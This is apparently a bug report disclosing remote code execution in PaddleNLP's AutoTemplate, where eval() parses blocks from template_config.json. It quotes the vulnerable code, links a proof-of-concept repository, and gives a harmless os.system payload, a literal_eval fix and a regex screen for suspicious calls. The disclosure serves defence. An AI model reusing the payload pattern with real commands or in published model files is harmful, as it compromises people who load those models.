[Bug]: Potential code execution when handling untrusted template_config.json via AutoTemplate #11212
Description
Software environment
paddle2onnx 2.1.0
paddlefsl 1.1.0
paddlenlp 2.8.1
paddlepaddle 3.3.0

Duplicate issues
- I have searched the existing issues
Bug description
The AutoTemplate component unsafely processes external template configuration files by evaluating their content with Python's eval() function.
When a user runs a text classification task, PaddleNLP reads template_config.json and passes its contents to Template.parse_template_string().
PaddleNLP/paddlenlp/prompt/template.py, lines 851 to 866 at commit 587a5cd:

```python
def load_from(
    cls, data_path: os.PathLike, tokenizer: PretrainedTokenizer, max_length: int, model: PretrainedModel = None
):
    template_config_file = os.path.join(data_path, TEMPLATE_CONFIG_FILE)
    if not os.path.isfile(template_config_file):
        raise ValueError("{} not found under {}".format(TEMPLATE_CONFIG_FILE, data_path))
    with open(template_config_file, "r", encoding="utf-8") as fp:
        config = [x.strip() for x in fp]
    prompt = json.loads(config[0])
    if len(config) > 1:
        template_class = json.loads(config[1])["class"]
    else:
        template_class = None  # Compatible with previous versions
    template = cls.create_from(
        prompt=prompt, tokenizer=tokenizer, max_length=max_length, model=model, template_class=template_class
    )
```
Inside this function, substrings wrapped in {} are directly evaluated as Python code using eval().
PaddleNLP/paddlenlp/prompt/template.py, lines 320 to 336 at commit 587a5cd:

```python
# Parse blocks with paired tokens like "{ }".
if prompt[index] == left_token:
    left_index = index
    while index < len(prompt):
        if prompt[index] == left_token:
            left_stack.append(index)
        elif prompt[index] == right_token:
            left_stack.pop()
            if len(left_stack) == 0:
                break
        index += 1
    if index == len(prompt) and len(left_stack) > 0:
        raise ValueError(
            "{} at position {} has no corresponding {}".format(left_token, left_index, right_token)
        )
    try:
        part_dict = eval(prompt[left_index : index + 1])
```
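The danger is easy to demonstrate in isolation: eval() on a "{...}" block will happily run arbitrary expressions, not just build a dict literal. A minimal sketch (the `captured` list is a stand-in for any attacker side effect such as a file write or network call):

```python
# The intended use: the block is a plain dict literal.
benign = "{'text': 'text_a'}"
print(eval(benign))

# An attacker-controlled block executes the same way: the append() call
# runs while the dict key expression is being evaluated.
captured = []
malicious = "{captured.append('pwned') or 'key': 'value'}"
result = eval(malicious)
print(result, captured)
```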
An attacker can publish a model repository containing a crafted template_config.json with embedded Python expressions. When a victim loads the model through standard PaddleNLP APIs (e.g., Taskflow), the payload is evaluated and executed automatically.
This turns external template configuration files into an attack vector and poses a supply-chain security risk: the payload hides in an auxiliary configuration file rather than in the model weights, allowing it to bypass many existing security checks.
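One common hardening for this pattern is to replace eval() with ast.literal_eval(), which accepts only Python literals and raises on function calls, attribute access, and the like. The sketch below illustrates that idea; it is an assumption about a possible fix, not PaddleNLP's actual patch:

```python
import ast

def parse_block(block: str):
    # ast.literal_eval rejects anything that is not a literal expression,
    # so "{os.system(...)}" raises instead of executing. "{'mask'}" parses
    # as a set literal, which the template syntax also uses.
    part = ast.literal_eval(block)
    if not isinstance(part, (dict, set)):
        raise ValueError("template block must be a dict or set literal")
    return part

print(parse_block("{'text': 'text_a'}"))  # plain literal: accepted

try:
    parse_block("{os.system('id')}")
except (ValueError, SyntaxError) as exc:
    print("rejected:", type(exc).__name__)
```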
Steps to reproduce & code
I built a proof-of-concept repository for demonstration:

```shell
git clone https://huggingface.co/XManFromXlab/paddlenlp-AutoTemplate-RCE
```

The payload looks like this:
"{os.system('echo \"You have been hacked!!!\" && touch /tmp/hacked.txt')}"
Once a victim runs the following code:

```python
from paddlenlp import Taskflow

Taskflow("text_classification", mode="prompt", task_path="./paddlenlp-AutoTemplate-RCE")
```

it prints the message You have been hacked!!! and creates an empty file /tmp/hacked.txt.
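Until the parser itself is fixed, users could screen a downloaded template file before loading it. The heuristic below is purely illustrative (the function name and regex are assumptions, not a PaddleNLP API), and a blocklist like this is no substitute for removing eval():

```python
import re

# Flag prompt strings whose "{...}" blocks contain call syntax, dunder
# names, an import, or common module access before they reach eval().
SUSPICIOUS = re.compile(r"__|\(|\bimport\b|\b(?:os|sys|subprocess)\s*\.")

def looks_safe(prompt: str) -> bool:
    return SUSPICIOUS.search(prompt) is None

print(looks_safe("{'text': 'text_a'} {'mask'}"))           # True
print(looks_safe("{os.system('touch /tmp/hacked.txt')}"))  # False
```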